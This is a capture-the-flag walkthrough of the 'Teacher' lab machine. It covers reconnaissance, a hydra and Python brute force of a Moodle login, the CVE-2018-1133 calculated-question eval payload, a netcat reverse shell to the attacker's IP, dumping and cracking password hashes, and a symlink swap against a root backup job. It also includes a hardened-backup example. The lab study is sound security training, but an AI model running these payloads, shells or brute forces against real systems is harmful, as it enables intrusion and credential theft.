Teacher – 10.10.10.153

Nmap scan:

cat nmap.txt
# Nmap 7.70 scan initiated Mon Apr 15 2019 as: nmap -sC -A -oN nmap.txt 10.10.10.153
Nmap scan report for 10.10.10.153
Host is up (0.039s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Blackhat highschool
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Network Distance: 2 hops

TRACEROUTE (using port 256/tcp)
HOP RTT      ADDRESS
1   42.03 ms 10.10.14.1
2   42.88 ms 10.10.10.153

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Apr 15 18:23:44 2019 -- 1 IP address (1 host up) scanned in 26.49 seconds

Only port 80 is open, so the whole attack surface is the web server.

Running dirb on it:

DIRB v2.22
By The Dark Raver

START_TIME: Mon Apr 15 2019
URL_BASE: http://10.10.10.153/
GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.153/ ----
==> DIRECTORY: http://10.10.10.153/css/
==> DIRECTORY: http://10.10.10.153/fonts/
==> DIRECTORY: http://10.10.10.153/images/
+ http://10.10.10.153/index.html
==> DIRECTORY: http://10.10.10.153/javascript/
==> DIRECTORY: http://10.10.10.153/manual/
==> DIRECTORY: http://10.10.10.153/moodle/
==> DIRECTORY: http://10.10.10.153/phpmyadmin/
+ http://10.10.10.153/server-status

phpmyadmin is present, so there is a MySQL/MariaDB database behind the site.

It answers 403 Forbidden, though, so we need another way in.

Browsing each directory listing, something odd stands out in /images:

Index of /images (Apache directory listing): twenty PNGs (1.png, 1_1.png, 2.png, 3.png, 4_4.png, 5.png, 5_5.png, ...). Every file is between 4.5K and 9.3K and dated 2018-06-27 03:25, except one: 5.png is 200 bytes and was modified later, at 2018-06-27 03:43.

5.png is only 200 bytes, far too small for a real PNG, so let's fetch it and look inside.

root@kali:~/Documents/HTB/Teacher-10.10.10.153# wget http://10.10.10.153/images/5.png
--2019-04-17  http://10.10.10.153/images/5.png
Connecting to 10.10.10.153:80... failed: Connection timed out.
Retrying.

--2019-04-17  (try: 2)  http://10.10.10.153/images/5.png
Connecting to 10.10.10.153:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 200 [image/png]
Saving to: '5.png'

5.png    100%[==================>]   200  --.-KB/s    in 0s

2019-04-17 - '5.png' saved [200/200]

root@kali:~/Documents/HTB/Teacher-10.10.10.153# cat 5.png
Hi servicedesk,

I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha.
Could you guys figure out what the last charachter is, or just reset it?

Thanks,

We now have all but the last character of a password, which reduces the brute force to a single-character search.

We will brute force that last character with hydra, which ships with Kali. Its http-post-form module needs:
– the login page URL
– the parameter names sent when logging in
– the failure message shown on a bad login
– a wordlist

First, find the login page; the /moodle/ directory from the dirb scan is the obvious candidate.

Screenshot: http://10.10.10.153/moodle/ is a Moodle site named "Teacher" with a calendar and one available course, Algebra, taught by Giovanni Chhatta. The login form lives at http://10.10.10.153/moodle/login/index.php and has Username, Password, "Remember username", "Log in", "Forgotten your username or password?" and a "Log in as a guest" button.

Capturing the login POST in Burp gives the parameter names:

POST /moodle/login/index.php HTTP/1.1
Host: 10.10.10.153
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.153/moodle/login/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: MoodleSession=kbmd8spv61urh1fmsuk81s7hs4
Connection: close
Upgrade-Insecure-Requests: 1

anchor=&username=giovanni&password=password

Failure message on a bad login:

Invalid login, please try again

Creating the wordlist: every candidate for the last character (letters in both cases, digits and a few symbols), one per line:

crunch 1 1 aAbBcCdDeEfFgGhHiIjJkKlLmMnNoOpPqQrRsStTuUvVwWxXyYzZ1234567890$%@!# -o wordlist.txt

Using hydra to brute force. The known prefix is hard-coded in the POST body and ^PASS^ stands for the single trailing character from the wordlist; the third field is the failure message hydra uses to tell a miss from a hit:

hydra -l giovanni -P wordlist.txt 10.10.10.153 http-post-form "/moodle/login/index.php:anchor=&username=^USER^&password=Th4C00lTheacha^PASS^:Invalid login, please try again" -Vv

Found: giovanni / Th4C00lTheacha#
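Added example (my code, not from the original writeup): the same single-character brute force as a short Python script, so the logic hydra hides is visible. It builds the candidates from the known prefix and the crunch character set, POSTs exactly the body Burp captured, and judges each attempt by the failure string, because Moodle answers a bad login with HTTP 200 and the error in the page body, so the status code tells you nothing. The network part sits behind an `attempt` callable so the search itself can be exercised without a target. The URL, username, prefix, charset and failure string are taken from the page; the helper names are my own.

```python
"""Brute-force the single missing trailing character of a Moodle password.

Added example for this writeup, not code from the original post. URL, username,
prefix, charset and failure string come from the page; helper names are mine.
"""
import http.cookiejar
import string
import urllib.parse
import urllib.request

LOGIN_URL = "http://10.10.10.153/moodle/login/index.php"
USERNAME = "giovanni"
KNOWN_PREFIX = "Th4C00lTheacha"                       # from 5.png
CHARSET = string.ascii_letters + string.digits + "$%@!#"   # same set crunch generated
FAILURE_MARKER = "Invalid login, please try again"     # hydra's failure condition


def candidates(prefix, charset):
    """All passwords that differ from the known prefix only in the last character."""
    return [prefix + c for c in charset]


def make_moodle_attempt(login_url, username, failure_marker=FAILURE_MARKER, timeout=10):
    """Return attempt(password) -> True when the login is accepted.

    A fresh cookie jar per try gives every request its own MoodleSession, as hydra
    does, and the body is the one Burp showed: anchor=&username=...&password=...
    """
    def attempt(password):
        jar = http.cookiejar.CookieJar()
        opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
        body = urllib.parse.urlencode(
            {"anchor": "", "username": username, "password": password}
        ).encode()
        with opener.open(login_url, data=body, timeout=timeout) as resp:
            page = resp.read().decode("utf-8", "replace")
        # Moodle returns 200 for both outcomes; only the body tells them apart.
        return failure_marker not in page
    return attempt


def brute_last_char(prefix, charset, attempt):
    """Try each candidate in order; return (password or None, attempts made)."""
    tried = 0
    for password in candidates(prefix, charset):
        tried += 1
        if attempt(password):
            return password, tried
    return None, tried


if __name__ == "__main__":
    found, tried = brute_last_char(
        KNOWN_PREFIX, CHARSET, make_moodle_attempt(LOGIN_URL, USERNAME)
    )
    print(f"{found!r} after {tried} attempts")
```

One request per candidate, at most 67 requests in total, so this is quiet enough that lockout policies rarely matter; if a target returns something other than the plain "Invalid login" text (a lockout notice, a CAPTCHA), the marker check will misreport a hit, so look at the page that produced the first "success" before trusting it.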

With those credentials we can log in to Moodle.
Next, look for a known vulnerability in Moodle that a logged-in user can reach.

Searching Google and exploit-db for Moodle vulnerabilities turns up an authenticated remote code execution in the "calculated" quiz question type (CVE-2018-1133), found by RIPS:

https://blog.ripstech.com/2018/moodle-remote-code-execution/

Hacking Moodle and gaining Remote Code Execution on its server

https://www.exploit-db.com/exploits/46551

The bug needs a user who can create quiz questions, so make sure you are logged in as a TEACHER of a course (giovanni teaches Algebra).

Screenshot: logged in as giovanni, the Algebra course page (Dashboard / My courses / ALG) shows Announcements and Topics 1 to 4, and the course administration menu offers Edit settings, Turn editing on, Course completion, Users, Filters, Reports, Gradebook setup, Backup, Restore, Import and Reset.

Turn editing on > Add an activity or resource > Quiz > Add

Name it, describe it, change nothing else > Save

Open the quiz > Edit quiz > Add > a new question > Calculated
Screenshot: "Choose a question type to add" lists Multiple choice, True/False, Matching, Short answer, Numerical, Essay, Calculated, Calculated simple, Drag and drop into text and the other drag-and-drop types. Pick Calculated ("Calculated questions are like numerical questions but with the numbers used selected randomly from a set when the quiz is taken").

Name it, describe it, and put the payload in the "Answer 1 formula" field:

/*{x}{a*/`$_GET[0]`/*(1)//}{a*/`$_GET[0]`/*({x})//}*/

The trick, as explained in the RIPS post linked above: Moodle validates the formula against a whitelist of safe functions and wildcards before handing it to eval(), but the validator and eval() read the string differently. The interleaved wildcard braces and PHP comment markers make the validator see only harmless wildcard references, while eval() ends up executing `$_GET[0]`, PHP's backtick shell-exec operator. Whatever arrives in GET parameter 0 is then run as a shell command by the web server user.

Answers section: Answer 1 formula = the payload above, Grade 100%, Tolerance ± 0.01, Tolerance type Relative; leave Answer display format and decimals at their defaults.

Save changes > Next page

This lands on "Editing a calculated question" > "Edit the wildcards datasets" (the URL contains ...datasetitems&cmid=...). There are no shared wildcards in this category; keep the defaults and use "Update the datasets parameters".

The formula is evaluated when this page loads, so we append our command to the URL as GET parameter 0, matching `$_GET[0]` in the payload:

&0=nc 10.10.14.6 8080 -e /bin/bash

Remember the command travels in a query string: URL-encode it (spaces as %20) and avoid characters such as & or # that the browser treats as query separators. Have a listener ready on the Kali box before loading the page:

nc -lvp 8080
listening on [any] 8080 ...

The page loaded, but nothing came back on the listener, so something was off.

Time for some trial and error. Before debugging the shell, confirm that commands execute at all and that the box can reach Kali: replace the command with ping 10.10.14.6 and, on Kali, watch for ICMP on the VPN interface:

tcpdump -i tun0 icmp

Then check the results:

04:56:40.625861 IP teacher.htb > kali: ICMP echo request, id 932, seq 1, length 64
04:56:40.625878 IP kali > teacher.htb: ICMP echo reply, id 932, seq 1, length 64
04:56:41.625919 IP teacher.htb > kali: ICMP echo request, id 932, seq 2, length 64
04:56:41.625936 IP kali > teacher.htb: ICMP echo reply, id 932, seq 2, length 64
04:56:41.664104 IP teacher.htb > kali: ICMP echo request, id 934, seq 1, length 64
04:56:41.664118 IP kali > teacher.htb: ICMP echo reply, id 934, seq 1, length 64
04:56:42.665501 IP teacher.htb > kali: ICMP echo request, id 934, seq 2, length 64
04:56:42.665518 IP kali > teacher.htb: ICMP echo reply, id 934, seq 2, length 64

Two pings were sent but four echo requests arrived. The capture explains it: there are two distinct ICMP ids (932 and 934), each with its own seq 1 and 2, so two separate ping processes ran and each sent two requests. Nothing to worry about; it does mean, though, that a non-idempotent command may run more than once.

Command execution and egress to Kali both work, so a reverse shell should too. Trying again with a fresh listener, this time on port 9989:

YES WE DID IT

nc -lvp 9989
listening on [any] 9989 ...
connect to [10.10.14.6] from teacher.htb [10.10.10.153] 33238
pwd
/var/www/html/moodle/question
whoami
www-data

Upgrade to a proper TTY with the usual python -c 'import pty; pty.spawn("/bin/bash")' and look around.

PRIV ESC 1.0: getting user

Enumeration:

www-data@teacher:/$ cat /etc/issue
Debian GNU/Linux 9 \n \l

www-data@teacher:/$ cat /etc/*release
PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
NAME="Debian GNU/Linux"
VERSION_ID="9"
VERSION="9 (stretch)"
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"

www-data@teacher:/$ cat /proc/version
Linux version 4.9.0-8-amd64 (debian-kernel@lists.debian.org) (gcc version 6.3.0 ...

SQL DATABASE


Moodle's config.php (/var/www/html/moodle/config.php) stores the database credentials in $CFG->dbuser and $CFG->dbpass. With them we connect to the moodle database with the mysql client and look for anything useful.

SHOW TABLES; lists every table in the database; among them mdl_user is the obvious target, so dump it:

SELECT * FROM mdl_user;

(trimmed to the relevant columns; the real rows have about fifty, nearly all empty)

+------+--------+-----------+-------------+--------------------------------------------------------------+------------+----------+----------------+---------------+
| id   | auth   | confirmed | username    | password                                                     | firstname  | lastname | email          | lastip        |
+------+--------+-----------+-------------+--------------------------------------------------------------+------------+----------+----------------+---------------+
|    1 | manual |         1 | guest       | $2y$10$ywuE5gDlAlaCu9R0w7pKW.UCB0jUH6ZVKcitP3gMtUNrAebiGMOdO | Guest user |          | root@localhost |               |
|    2 | manual |         1 | admin       | $2y$10$7VPsdU9/9y2J4Mynlt6vM.a4coqHRXsNTOq/1aA6wCWTsF2wtrDO2 | Admin      | User     | gio@gio.nl     | 192.168.206.1 |
|    3 | manual |         1 | giovanni    | $2y$10$38V6kI7LNudORa7lBAT0q.vsQsv4PemY7rf/M1Zkj/i1VqLO0FSYO | Giovanni   | Chhatta  | Giio@gio.nl    | 10.10.14.6    |
| 1337 | manual |         0 | Giovannibak | 7a860966115182402ed06375cf0a22af                             |            |          |                |               |
+------+--------+-----------+-------------+--------------------------------------------------------------+------------+----------+----------------+---------------+

The Giovannibak row stands out. The other three accounts carry bcrypt hashes ($2y$10$..., salted and deliberately slow), which is what Moodle produces by default; this one holds a bare 32-hex-character value, i.e. an unsalted MD5 hash. A hash is not encryption and cannot be decrypted, but an unsalted MD5 of a common word is found instantly by an online lookup or a wordlist attack:

Online MD5 lookup: 7a860966115182402ed06375cf0a22af
Found: expelled
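Added example (my code, not from the writeup): the triage a practitioner does on that dump before reaching for a cracker. The four password values are copied from the mdl_user rows above; the script classifies each one (bcrypt with its cost factor versus bare MD5) and runs a dictionary attack only against the cheap one. The wordlist is a constructed stand-in and the function names are mine.

```python
"""Triage the mdl_user password column: which hashes are worth attacking offline?

Added example, not from the original writeup. The four rows are copied from the
mdl_user dump above; the small wordlist is constructed; function names are mine.
"""
import hashlib
import re

# (username, password column) as dumped from mdl_user
MDL_USER_ROWS = [
    ("guest", "$2y$10$ywuE5gDlAlaCu9R0w7pKW.UCB0jUH6ZVKcitP3gMtUNrAebiGMOdO"),
    ("admin", "$2y$10$7VPsdU9/9y2J4Mynlt6vM.a4coqHRXsNTOq/1aA6wCWTsF2wtrDO2"),
    ("giovanni", "$2y$10$38V6kI7LNudORa7lBAT0q.vsQsv4PemY7rf/M1Zkj/i1VqLO0FSYO"),
    ("Giovannibak", "7a860966115182402ed06375cf0a22af"),
]

# Modular-crypt bcrypt: $2a$/$2b$/$2y$, two-digit cost, then salt+digest in bcrypt's base64.
BCRYPT_RE = re.compile(r"^\$2[aby]\$(\d{2})\$[./A-Za-z0-9]+$")
# Bare 32 hex characters: raw MD5, no salt, no iteration count.
MD5_RE = re.compile(r"^[0-9a-fA-F]{32}$")


def classify_hash(value):
    """Name the scheme so the cost of attacking it is obvious at a glance."""
    m = BCRYPT_RE.match(value)
    if m:
        return f"bcrypt cost={int(m.group(1))}"   # 2**cost rounds per guess
    if MD5_RE.match(value):
        return "md5 (unsalted)"                    # one hash per guess, reusable across users
    return "unknown"


def md5_hex(word):
    return hashlib.md5(word.encode()).hexdigest()


def crack_md5(target, wordlist):
    """Plain dictionary attack: one MD5 per word; returns the word or None."""
    target = target.lower()
    for word in wordlist:
        if md5_hex(word) == target:
            return word
    return None


def triage(rows):
    """Return ([(username, scheme)], [(username, hash)] of the entries cheap to crack)."""
    classes = [(user, classify_hash(h)) for user, h in rows]
    cheap = [(user, h) for user, h in rows if classify_hash(h).startswith("md5")]
    return classes, cheap


if __name__ == "__main__":
    classes, cheap = triage(MDL_USER_ROWS)
    for user, scheme in classes:
        print(f"{user:12s} {scheme}")
    # constructed wordlist standing in for rockyou or an online lookup
    wordlist = ["password", "teacher", "algebra", "expelled"]
    for user, h in cheap:
        print(f"{user}: {crack_md5(h, wordlist)!r}")
```

The bcrypt rows are not worth the time at this stage: each guess costs 2^10 rounds and the salt forces one run per user, while the MD5 row falls to a single pass over any wordlist. When the cheap hash turns out to belong to an obvious backup of a real user, its password is the first thing to try on that user's shell account.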

Let's try that password on the giovanni system account.

MariaDB [moodle]> exit
Bye
$ su giovanni
Password: expelled
giovanni@teacher:~$ ls
user.txt  work
giovanni@teacher:~$ cat user.txt
(32-character user flag)

It Worked!

ONTO ROOT:

wget is available on the box, so serve LinEnum.sh from the Kali box and fetch it:

giovanni@teacher:~$ wget http://10.10.14.6/LinEnum.sh
--2019-04-19  http://10.10.14.6/LinEnum.sh
Connecting to 10.10.14.6:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 45639 (45K) [text/x-sh]
Saving to: 'LinEnum.sh'

LinEnum.sh   100%[==================>]  44.57K  --.-KB/s    in 0.08s

2019-04-19 (538 KB/s) - 'LinEnum.sh' saved [45639/45639]

giovanni@teacher:~$ ./LinEnum.sh
bash: ./LinEnum.sh: Permission denied
giovanni@teacher:~$ chmod +x LinEnum.sh
giovanni@teacher:~$ ./LinEnum.sh

Under giovanni's home we find a courses directory that a root job backs up every few seconds or minutes: the backup_courses.tar.gz next to it is owned by root and keeps getting refreshed, while the directory itself belongs to us.

Since we control the path the job reads, we:

  1. rename the directory to courses.bak
  2. create courses again as a symbolic link to /root/

–> The job runs as root and follows the symlink, so from now on every run operates on /root/ instead of our files: the whole /root/ directory is being backed up into our courses directory every few seconds or minutes.

Now we can read the root flag.

$ mv courses courses.bak
$ ln -s /root/ courses
$ ls -la
total 16
drwxr-xr-x 3 giovanni giovanni 4096 Apr 19 15:09 .
drwxr-xr-x 4 giovanni giovanni 4096 Jun 27  2018 ..
-rwx...... 1 root     root      256 Apr 19 15:11 backup_courses.tar.gz
lrwxrwxrwx 1 giovanni giovanni    6 Apr 19 15:09 courses -> /root/
drwxrwxrwx 3 root     root     4096 Jun 27  2018 courses.bak
$ cd courses
$ ls
algebra  root.txt
$ cat root.txt
(32-character root flag)
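Added example (my code; the page never shows the box's real backup script, so the job below is a model of it, assuming it archives courses/* the way tar would): a root job that archives a directory under a user's control, the symlink swap giovanni performed, and a hardened version of the same job that refuses the symlink. Everything is built in a temporary directory with constructed files, so it runs without root and shows the leak on the way out.

```python
"""A privileged backup job that follows an attacker-controlled symlink.

Added example modelling the privilege escalation above; not the box's real
backup script (the page never shows it). Assumption: the job archives
courses/* from the user's work directory, as `tar ... courses/*` would.
Runs entirely in a temp dir with constructed files; no root needed.
"""
import os
import pathlib
import tarfile
import tempfile


def backup_courses(work_dir, out_tar):
    """The vulnerable job: archives every entry under work_dir/courses.

    Listing courses/* goes *through* a symlinked courses directory, and the
    entries found there are regular files, so they are archived as content.
    Point courses at /root and the archive fills with /root's files.
    """
    courses = os.path.join(work_dir, "courses")
    with tarfile.open(out_tar, "w:gz") as tar:
        for name in sorted(os.listdir(courses)):
            tar.add(os.path.join(courses, name), arcname=f"courses/{name}")
    return out_tar


def safe_backup_courses(work_dir, out_tar):
    """Hardened job: refuse a symlinked courses dir, and refuse any entry that
    is a symlink or resolves outside work_dir, before touching a single file."""
    base = pathlib.Path(work_dir).resolve()
    courses = pathlib.Path(work_dir) / "courses"
    if courses.is_symlink():
        raise PermissionError("courses is a symlink; refusing to back it up")
    for path in courses.rglob("*"):
        if path.is_symlink() or base not in path.resolve().parents:
            raise PermissionError(f"{path} escapes {base}")
    return backup_courses(work_dir, out_tar)


def hijack_courses(work_dir, target):
    """What giovanni did: mv courses courses.bak; ln -s /root/ courses"""
    courses = os.path.join(work_dir, "courses")
    os.rename(courses, courses + ".bak")
    os.symlink(target, courses)


def archived_text(tar_path, member):
    with tarfile.open(tar_path, "r:gz") as tar:
        return tar.extractfile(member).read().decode()


def demo():
    """Build the scenario in a temp dir and report what happened (constructed data)."""
    with tempfile.TemporaryDirectory() as tmp:
        fake_root = os.path.join(tmp, "root")   # stands in for /root
        work = os.path.join(tmp, "work")        # stands in for giovanni's work dir
        os.makedirs(fake_root)
        pathlib.Path(fake_root, "root.txt").write_text("constructed-root-flag\n")
        os.makedirs(os.path.join(work, "courses", "algebra"))
        pathlib.Path(work, "courses", "algebra", "notes.txt").write_text("algebra\n")

        # Honest tree: the hardened job is happy and archives the course files.
        honest = safe_backup_courses(work, os.path.join(tmp, "honest.tar.gz"))
        honest_ok = archived_text(honest, "courses/algebra/notes.txt").strip() == "algebra"

        # The swap giovanni performed, then the vulnerable job runs again.
        hijack_courses(work, fake_root)
        leaked_tar = backup_courses(work, os.path.join(tmp, "backup_courses.tar.gz"))
        leaked = archived_text(leaked_tar, "courses/root.txt").strip()

        # The hardened job refuses the symlinked directory outright.
        try:
            safe_backup_courses(work, os.path.join(tmp, "safe.tar.gz"))
            refused = False
        except PermissionError:
            refused = True
        return {"honest_ok": honest_ok, "leaked": leaked, "hardened_refused": refused}


if __name__ == "__main__":
    print(demo())
```

The hardened check is still check-then-use: an attacker who can rename things in the tree can race it. The real fix is not to run a privileged job over a tree an unprivileged user can rename or link into at all (copy the data as that user, or have root read only from a root-owned location); the check merely makes the window small.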

Rooted!

Overall a super fun box: pretty straightforward but not too easy. Definitely recommended.